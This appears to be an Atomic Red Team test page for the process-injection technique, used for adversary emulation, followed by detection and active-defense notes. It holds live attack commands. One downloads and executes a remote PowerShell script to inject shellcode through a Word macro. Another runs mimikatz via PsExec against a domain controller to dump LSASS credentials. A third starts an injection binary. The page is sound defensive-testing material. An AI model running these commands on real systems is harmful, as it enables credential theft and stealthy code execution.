# T1055 - Process Injection
Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. 

## Atomic Tests

### Atomic Test #1 - Shellcode execution via VBA
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.

Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The 64-bit version of Microsoft Office must be installed

##### Check Prereq Commands:
```powershell
try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"

```
##### Description: #{txt_path} must exist on disk at specified location

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt"

```

In [ ]:
Invoke-AtomicTest T1055 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
```

In [ ]:
Invoke-AtomicTest T1055 -TestNumbers 1

### Atomic Test #2 - Remote Process Injection in LSASS via mimikatz
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
Especially useful against domain controllers in Active Directory environments.
It must be executed in the context of a user who is privileged on remote `machine`.

The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "C:\PSTools\PsExec.exe") { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "C:\PSTools\PsExec.exe") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "C:\PSTools\PsExec.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1055 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
C:\PSTools\PsExec.exe /accepteula \\DC1 -c %tmp%\mimikatz\x64\mimikatz.exe "lsadump::lsa /inject /id:500" "exit"
```

In [ ]:
Invoke-AtomicTest T1055 -TestNumbers 2

### Atomic Test #3 - Section View Injection
This test creates a section object in the local process followed by a local section view.
The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view. 
A thread is then created in the target process, using the remote section view as start address.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055\bin\x64\InjectView.exe
```

In [ ]:
Invoke-AtomicTest T1055 -TestNumbers 3

## Detection
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as <code>CreateRemoteThread</code>, <code>SuspendThread</code>/<code>SetThreadContext</code>/<code>ResumeThread</code>, <code>QueueUserAPC</code>/<code>NtQueueApcThread</code>, and those that can be used to modify memory within another process, such as <code>VirtualAllocEx</code>/<code>WriteProcessMemory</code>, may be used for this technique.(Citation: Elastic Process Injection July 2017) 

Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 

Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 

Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 

Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 

## Shield Active Defense
### Security Controls 
 Alter security controls to make the system more or less vulnerable to attack. 

 Manipulating security controls involves making configuration changes to the security settings of a system including things like modifying Group Policies, disabling/enabling autorun for removable media, and tightening or relaxing system firewalls, etc.
#### Opportunity
In an adversary engagement scenario, there is an opportunity to implement security controls to support your defensive objectives over a prolonged engagement.
#### Use Case
A defender could implement security controls to have an effect on process injection techniques such as AppLocker or an Antivirus/EDR tool designed to watch for CreateRemoteThread events.
#### Procedures
Weaken security controls on a system to allow for leaking of credentials via network connection poisoning.
Implement policies on a system to prevent the insecure storage of passwords in the registry. This may force an adversary to revert these changes or find another way to access cached credentials.